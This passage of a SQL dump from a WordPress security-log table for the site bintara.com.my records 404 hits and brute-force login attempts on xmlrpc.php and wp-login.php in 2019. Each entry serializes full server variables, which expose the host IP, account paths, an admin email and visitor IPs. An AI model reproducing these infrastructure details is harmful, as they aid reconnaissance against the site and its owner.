10-19 12:58:22','2019-10-19 12:58:20',34964072,36767864,'https://bintara.com.my/%23News',1,0,'61.239.49.117'),(28362,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/%23Services\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23060834\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:32:\"https://bintara.com.my/#Services\";s:19:\"REDIRECT_SCRIPT_URL\";s:10:\"/#Services\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIToSv37jYkcNzit2ODwAAAAo\";s:12:\"REDIRECT_URL\";s:10:\"/#Services\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:5:\"12856\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:32:\"https://bintara.com.my/#Services\";s:10:\"SCRIPT_URL\";s:10:\"/#Services\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIToSv37jYkcNzit2ODwAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489870.5718\";s:12:\"REQUEST_TIME\";s:10:\"1571489870\";}}','notice','2019-10-19 12:57:53','2019-10-19 12:57:51',34961976,36763808,'https://bintara.com.my/%23Services',1,0,'61.239.49.117'),(28361,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:39:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:9:\"/%23About\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"winHttp 23056974\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/#About\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/#About\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XasIPwZfHioVGWbjloH-MwAAAMk\";s:12:\"REDIRECT_URL\";s:7:\"/#About\";s:11:\"REMOTE_ADDR\";s:13:\"61.239.49.117\";s:11:\"REMOTE_PORT\";s:4:\"8947\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/#About\";s:10:\"SCRIPT_URL\";s:7:\"/#About\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XasIPwZfHioVGWbjloH-MwAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571489855.4792\";s:12:\"REQUEST_TIME\";s:10:\"1571489855\";}}','notice','2019-10-19 12:57:38','2019-10-19 12:57:36',34960992,36778360,'https://bintara.com.my/%23About',1,0,'61.239.49.117'),(28360,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xar5GwZfHioVGWbjloH8RQAAAMg\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"24341\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xar5GwZfHioVGWbjloH8RQAAAMg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571485979.793\";s:12:\"REQUEST_TIME\";s:10:\"1571485979\";}}','notice','2019-10-19 11:53:03','2019-10-19 11:53:00',35664224,37459664,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(28359,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571483341.3475461006164550781250\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571483341.3475461006164550781250\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1571483341.3475461006164550781250\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.3; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:29:\"/sbin:/usr/sbin:/bin:/usr/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1571483341.3475461006164550781250\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"58890\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1571483341.3475461006164550781250\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaruzYagLkv5hpb4fc1lEwAAAQ4\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaruzYagLkv5hpb4fc1lEwAAAQ4\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"58890\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaruzYagLkv5hpb4fc1lEwAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571484250.3559\";s:12:\"REQUEST_TIME\";s:10:\"1571484250\";}}','notice','2019-10-19 11:24:17','2019-10-19 11:24:14',34997192,35250584,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1571483341.3475461006164550781250',1,0,'103.6.198.69'),(23387,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"178.18.82.241\";s:11:\"REMOTE_PORT\";s:5:\"37658\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTWTbdCvC5@KvzqwiFJFQAAAAI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566889549.2346\";s:12:\"REQUEST_TIME\";s:10:\"1566889549\";}}','notice','2019-08-27 07:05:51','2019-08-27 07:05:49',18200216,19500384,'https://bintara.com.my/xmlrpc.php',1,0,'178.18.82.241'),(23388,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"104.41.5.236\";s:11:\"REMOTE_PORT\";s:5:\"60544\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTYX4tV65@1l3w0lHNhtAAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566890079.3832\";s:12:\"REQUEST_TIME\";s:10:\"1566890079\";}}','notice','2019-08-27 07:14:40','2019-08-27 07:14:39',17684816,19175352,'https://bintara.com.my/wp-login.php',1,0,'104.41.5.236'),(23389,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.33.117\";s:11:\"REMOTE_PORT\";s:5:\"49601\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTcX4tV65@1l3w0lHNlGgAAAEM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566891103.7551\";s:12:\"REQUEST_TIME\";s:10:\"1566891103\";}}','notice','2019-08-27 07:31:45','2019-08-27 07:31:44',17683296,19173856,'https://bintara.com.my/wp-login.php',1,0,'167.71.33.117'),(23390,0,'brute_force','invalid-login::username-gast','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:4:\"gast\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"472\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"167.71.33.117\";s:11:\"REMOTE_PORT\";s:5:\"50166\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWTcaItV65@1l3w0lHNlGwAAAFI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc